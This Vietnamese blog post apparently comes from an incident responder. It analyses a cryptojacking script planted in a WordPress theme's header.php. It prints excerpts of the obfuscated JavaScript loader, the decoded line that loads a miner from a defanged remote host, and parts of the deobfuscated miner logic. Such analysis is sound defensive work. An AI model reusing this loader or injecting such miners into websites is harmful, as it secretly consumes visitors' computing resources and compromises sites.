Trong quá trình điều tra ứng phó sự cố, chúng tôi đã phát hiện ra một phần thú vị của phần mềm độc hại JavaScript bị che khuất nghiêm trọng. Sau khi được giải mã, Công cụ khai thác tiền điện tử đã được chạy trên các khách hàng truy cập trang web.
Bằng cách xem xét phần mềm độc hại sau đây, điều này có thể làm nản lòng và đáng sợ, nhưng chúng ta hãy xem lại mã phần mềm độc hại và xem cách kẻ tấn công khéo léo tạo mã Crypto Miner được đặt vào tệp ./wp-content/theme/responsive/header.php:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_.
…...
Kẻ tấn công đã đặt mã ở đầu một tập tin hợp pháp. Khi trang web được mở, nó đã thực thi mã JavaScript và bắt đầu khai thác tiền điện tử.
Từng bước làm việc với mã độc hại để xem nó hoạt động như thế nào.
Bước đầu tiên là làm cho mã có ý nghĩa hơn, vì vậy chúng ta sẽ lấy nó ở định dạng dễ đọc hơn.
Mã độc được đặt giữa các thẻ JavaScript mở và đóng như được chỉ ra bên dưới:
<script>
$ = ~[];
$ = {
___: ++$,
$$$$: (![] + "")[$],
__$: ++$,
$_$_: (![] + "")[$],
_$_: ++$,
$_$$: ({} + "")[$],
$$_$: ($[$] + "")[$],
_$$: ++$,
$$$_: (!"" + "")[$],
$__: ++$,
$_$: ++$,
$$__: ({} + "")[$],
$$_: ++$,
$$$: ++$,
$___: ++$,
$__$: ++$
};
.....</script>
Khi phần mềm độc hại bị mã hóa đã được giải mã, nó chứa mã JavaScript sau sẽ được sử dụng trong giai đoạn tiếp theo của Tiền điện tử. Nếu chúng ta nhìn vào mã độc, chúng ta có thể thấy biến số el el có chứa một đối tượng tập lệnh sẽ kéo tải trọng khai thác tiền điện tử cuối cùng từ web{.}cloud
var el = document.createElement('script');el.src='https://web[.]clod[.]pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTN…….
Để so sánh, chúng ta hãy xem playload của Công cụ khai thác tiền điện tử được lấy từ web web [.] Clod [.] Pw livevà xem nó hoạt động như thế nào. Đây là một phần nhỏ của phần mềm độc hại đã được rút ra
if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop
|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i
|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.
(browser|link)|vodafone|wap|windows ce|xda|xiino/i [_0x2ce8('0x7d')](b) ||
/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|
as(te|us)|attw|au(di|\-m|r |s ….
Sau khi tất cả các chức năng đã được kiểm tra và xác minh, nó sẽ chạy công cụ khai thác coin và thực thi tập lệnh khai thác Crypto bằng phần cứng máy tính của bạn. Quá trình khai thác sẽ bắt đầu khai thác tiền điện tử cho tin tặc:
if (![]) {
if (document[_0x2ce8('0xae')][_0x2ce8('0xaf')](/google|yandex|mail|vk.com|ask|bing/) || localStorage[_0x2ce8('0xb0')](_0x2ce8('0xab'))
|| sessionStorage && sessionStorage[_0x2ce8('0xb0')](_0x2ce8('0xab')))
{
localStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
sessionStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
runMiner();
}
} else {
runMiner();
}
if (document[_0x2ce8('0x1d3')]) {
var node = document[_0x2ce8('0x1d3')](_0x2ce8('0x1cd'));
if (node && node[_0x2ce8('0x1d5')]) {
node[_0x2ce8('0x1d5')]();
}
}
Không có nhận xét nào:
Đăng nhận xét